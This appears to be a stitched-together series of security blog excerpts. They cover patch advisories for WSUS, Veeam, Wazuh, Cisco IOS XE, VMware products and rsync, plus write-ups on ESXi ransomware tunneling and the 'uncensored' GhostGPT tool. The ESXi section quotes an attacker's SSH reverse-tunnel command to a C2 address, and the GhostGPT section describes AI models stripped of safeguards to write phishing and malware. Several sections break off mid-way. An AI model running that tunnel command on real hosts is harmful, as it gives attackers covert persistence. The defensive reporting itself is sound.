The issue allows remote attackers to run code with full system privileges on any Windows Server that has the WSUS Server Role turned on. It doesn’t take user interaction, and what's worse, Microsoft has warned it could be used to spread between WSUS servers. Servers that do not have WSUS enabled are not affected, but if the role is active before you patch, you are at risk, so again, patch!

The company has released updates for every supported Windows Server version, including 2012, 2016, 2019, 2022, 23H2, and 2025. Once you install the update, a reboot is required as part of remediation. It is a cumulative update, so you only need to apply this one.

For anyone who can’t patch right away, Microsoft has come up with two workarounds you can apply. You can disable the WSUS role to remove the attack vulnerability, or block inbound traffic to ports 8530 and 8531 on your firewall. Keep in mind that doing this your WSUS server is going to stop functioning as an update server and clients won't be able to pull updates from it.

After patching, you might notice that WSUS no longer shows synchronization error details. Microsoft said this was removed for now as part of the fix. If you have Windows servers in a home lab or production, treat this one as urgent. The exploit is already public and attackers can use it to get complete control of your server. Install the patch as soon as possible to close the hole.

Read the CVE here: CVE-2025-59287 - Security Update Guide - Microsoft - Windows Server Update Service (WSUS) Remote Code Execution Vulnerability

What versions are affected?

This affects Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds. 

Don't join your Veeam Servers to the domain

It is definitely not a good practice in 2025 to be domain joining your Veeam Backup & Replication servers to the domain. Why? Well, domain credentials are some of the most vulnerable credentials and used credentials out there that can easily get phished by attackers using a phishing email, or some other type of attack. By taking your Veeam Servers off the domain, you are mitigating the chance that compromised domain credentials are able to compromise your Veeam environment, especially when thinking about a ransomware attack.

This vulnerability is as bad as it gets as the user doesn't have to be a domain admin from the looks of it and can just simply be a domain user to launch the attack. It means that an attacker can just have compromised credentials from any domain user and attack your Veeam environment.

Take a look at the official guidance from Veeam on security best practices for Veeam environments: Security & Compliance Analyzer - User Guide for VMware vSphere.

Download the fixed version

You can download the fixed version here:

• Veeam Backup & Replication 12.3.1 (build 12.3.1.1139)

Affected Versions:

• • Vulnerable: Wazuh Manager versions 4.4.0 through 4.9.0.
  • Patched: Version 4.9.1 and later

What can attackers do with this vulnerability?

What is the potential impact of this vulnerability for Wazuh?

Impact: Attackers can exploit this vulnerability to:​

1. They can execute ad-hoc Python code remotely​
2. Shut down or take control of Wazuh servers​
3. If they compromise agents they can exploit this to propogate the attack within a cluster.​ng this a critical issue for organizations relying on Wazuh for security monitoring​

Mitigation steps to remediate:

1. Upgrade as soon as possible: Update to Wazuh version 4.9.1 or later, where the issue has been patched. 
2. Restrict API Access: You need to limit access to the API to trusted networks and enforce strict authentication​
3. Monitor your logs: You need to regularly review logs for suspicious activity. This includes things like unusual API calls or unauthorized access attempts​
4. Harden your agents: Secure your Wazuh agents to avoid compromise by means of that attack vector

Organizations need to upgrade to mitigate potential exploitation risks and keep their infrastructure safe from attackers trying to take advantage of CVE-2025-24016.

You can see ​more info about the vulnerability here: GitHub - MuhammadWaseem29/CVE-2025-24016: CVE-2025-24016: RCE in Wazuh server! Remote Code Execution

Key Vulnerabilities Used in the Attacks

🔴 CVE-2023-20198 – Privilege escalation vulnerability
🔴 CVE-2023-20273 – Web UI command injection flaw

Apparently, these vulnerabilities have been used in recent attack. These have led to breaches at multiple telecommunications providers, including:
✅ A U.S. ISP
✅ A U.S.-based affiliate of a U.K. telecom provider
✅ A South African telecom provider
✅ An Italian ISP
✅ A major Thailand telecom provider

How the Attacks Work

Threat researchers have noticed that Salt Typhoon compromised and reconfigured Cisco devices where they use Generic Routing Encapsulation (GRE) tunnels to maintain persistence. What has happened so far?

Between December 2024 and January 2025, Salt Typhoon has targeted over 1,000 Cisco network devices. More than half of the devices have been located in:
📍 U.S.
📍 South America
📍 India

Insikt Group also found that over 12,000 Cisco devices remain exposed to the internet. This is crazy! Don't do this! It seems like only 8% of them have been actively targeted. This probably means there is some type of strategic selection process focused on telecom-related infrastructure.

Cisco Devices are always a target

This isn’t the first time Cisco vulnerabilities have been exploited. Two years ago, these same flaws were used in zero-day attacks to compromise more than 50,000 Cisco IOS XE devices. It allowed hackers to deploy backdoor malware using rogue privileged accounts.

A November advisory from Five Eyes listed these vulnerabilities among the top four most exploited in 2023.

U.S. Telecoms & Government Officials Affected

This campaign is part of a broader espionage effort confirmed by the FBI and CISA. In October 2024 these revealed that Salt Typhoon had breached:

• AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream
• Other telecom companies across dozens of countries
• Private communications of U.S. government officials
• U.S. law enforcement’s wiretapping platform

Security Recommendations

🔹 Patch immediately – Apply all security updates for Cisco IOS XE as soon as possible.
🔹 Disable public facing interfaces – Never expose administration interfaces and non-essential services directly to the internet.
🔹 Monitoring – Check for unauthorized GRE tunnel configurations or suspicious activity.

The FCC, CISA, and the White House have issued multiple warnings in response to these breaches, urging telecom providers to harden their networks and switch to encrypted communication platforms for secure messaging.

📌 Are you running Cisco IOS XE devices? Have you noticed unusual activity in your network logs? Share your insights and experiences below.

What can the vulnerabilities lead to? Note the following that are listed in the official VMSA thred 

• information disclosure, privilege escalation, and cross-site scripting (XSS) attacks

🔴 Affected Vulnerabilities

🛠️ Resolution: Apply Security Patches ASAP

As a note, there are no workarounds. Here are the patched versions:

• VMware Aria Operations for Logs: 8.18.3
• VMware Aria Operations: 8.18.3
• VMware Cloud Foundation: KB92148

🔗 Patch Links & Documentation:

• VMware Aria Operations for Logs 8.18.3 Release Notes
• VMware Aria Operations 8.18.3 Release Notes

For the deets on the info, you can see the official advisory here:

• VMSA-2025-0003

You need to take note of a serious vulnerability tracked by the CVE-2025-22217. The CVSS score is 8.6. It is described as:

• Unauthenticated blind SQL injection

What can an attacker do? 

• An attacker with network access can use a specially crafted SQL query to gain database access to your AVI Load Balancer

You can read more specifics of the attack here directly from the Broadcom security advisory: Support Content Notification.

What do users need to do to remediate the SQL injection vulnerability? Apply the patches listed in the below response matrix. This information comes directly from the Broadcom security advisory page.

Response Matrix:

Unfortunately, this leaves a lack of visibility on who and what is connecting to ESXi and can mean ransomware gangs and attackers can gain a foothold in the environment and setup persistence. 

Attackers can even setup port forwards using SSH with commands like this:

ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>

VMware ESXi is not the easiest solution to manage for host connections as VMware ESXi spreads logging across many different logs located on the ESXi host. You can use something like Grafana Loki that I have written about in the past here: Grafana Loki Configuration Syslog Server for Home Labs or something like VMware Log Insight (the old name).

Below is a screenshot of the Grafana Loki interface:

I encourage ones to use a privileged access workstation to access their VMware ESXi environment in production that is hopefully on a different management network and not on the same network as your LAN with clients, which is extremely dangerous. Using a solution like Kasm can allow you to have a secure connection into your environment with secure browsers that are burned when you disconnect or shortly thereafter. Then filtering all other traffic, including SSH is a great security boundary.

Attacking the hypervisor and the virtualization environment is a smart move by attackers as it doesn't matter how secure your endpoints and servers are if they can compromise the holy grail of where most of your data is running and is stored. This is a wake up call for vSphere admins and other server administrators to introduce better access security and monitoring in their environment.

These are my thoughts on the information found in the post here: Understanding ESXi Ransomware: SSH Tunneling and Defense Strategies.

What Is GhostGPT?

Well, it is what they are calling "uncensored AI" in that it is a tool that can be used by hackers without any guardrails or ethical filters to the prompts. In case you didn't realize, there are some safeguards in place on public AI resources like ChatGPT that filter certain queries for ethical reasons, such as hacking and other nefarious schemes.

Supposedly, it has a "no-logs policy" so that conversations are untraceable, and you can access it using Telegram which is a service that attackers have long used for cybercrime activities. GhostGPT has been showing up in cybercrime forums and is largely referenced with focus on business email compromise scams and other malicious activities. 

Phishing and Malware

Abnormal Security researches tested GhostGPT with a simple prompt for it to draft a phishing email that mimicked DocuSign. The results that it produced were very legitimate and convincing. As with most phishing attempts it urged the recipient to click a link to review a document which is common when harvesting credentials.

However, this wasn't the extent of what GhostGPT was able to do. It can also code malware and help with exploring and developing exploits for hackers. This tool will make it much easier for hackers to develop these tools, saving time and energy to work on other aspects of a cybercrime initiative. 

Is this "Dark AI"

Yes, Dark AI is a real thing. It is a term that has come to light with the increase in demand for malicious tools backed by AI. 

You may have seen just a couple of years ago, tools like WormGPT and FraudGPT. These tools help to lower the skills needed to carry out sophisticated attacks and even allow attackers without much experience to conduct advanced phishing, BEC scams, and even launch a ransomware attack.

GhostGPT seems to be the latest in the wave of tools coming out that will help with this goal of compromise, attack, extortion, and other malicious activities.

AI use is increasing in cybercrime

A recent report by Egress cited that 75% of all the phishing kits sold on the dark web now include some type of AI capabilities. VIPRE security found that 40% of business email compromise attempts involved AI generated emails. These are also used in ransomware campaigns unfortunately. 

Even the legitimate tools out there like ChatGPT have been used for malicious purposes, but OpenAI has taken steps to help disrupt activities by malware developers and other threat actors trying to use it for cybercrime.

The thoughts on GhostGPT come from the Abnormal Security report on this new tool. You can find that here: How GhostGPT Empowers Cybercriminals with Uncensored AI | Abnormal.

RsyncProject/rsync

Take note of the steps below for patching across different Linux distros:

Distros based on Debian (Ubuntu, Debian)

Check the repos for updates 

sudo apt update

Update rsync:

sudo apt install --only-upgrade rsync

After updating, check your version of rsync:

rsync --version

 If the version in the repository is outdated, install build dependencies:

sudo apt install build-essential wget libssl-dev -y

Download the latest rsync source code:

wget https://download.samba.org/pub/rsync/src/rsync-3.4.0.tar.gz

Extract the package and compile:

tar -xzf rsync-3.4.0.tar.gz cd rsync-3.4.0 ./configure make sudo make install

Finally, once you have installed, verify the rsync version:

rsync --version

Distros based on RHEL (CentOS, Rocky Linux, AlmaLinux, Fedora)

You can use DNF or Yum to update:

sudo yum update rsync

sudo dnf update rsync

Finally, chjeck the version of rsync:

rsync --version

sudo yum install epel-release -y

sudo yum install rsync

Build from Source

If the repository version is still outdated, follow the same steps as in the Debian instructions for compiling from source.

Distros based on Arch (Arch Linux, Manjaro)

sudo pacman -Syu rsync

rsync --version

If rsync 3.4.0 is not yet in the official Arch repositories, use the AUR (Arch User Repo) or you can also compile it from source like the other distros we have mentioned.

Distros based on SUSE (openSUSE, SLES)

You can update your system packages and update rsync:

sudo zypper refresh sudo zypper update rsync

Check the version of rsync:

rsync --version

Hopefully, this cheat sheet of update commands and building from source will help those looking to update their rsync environment.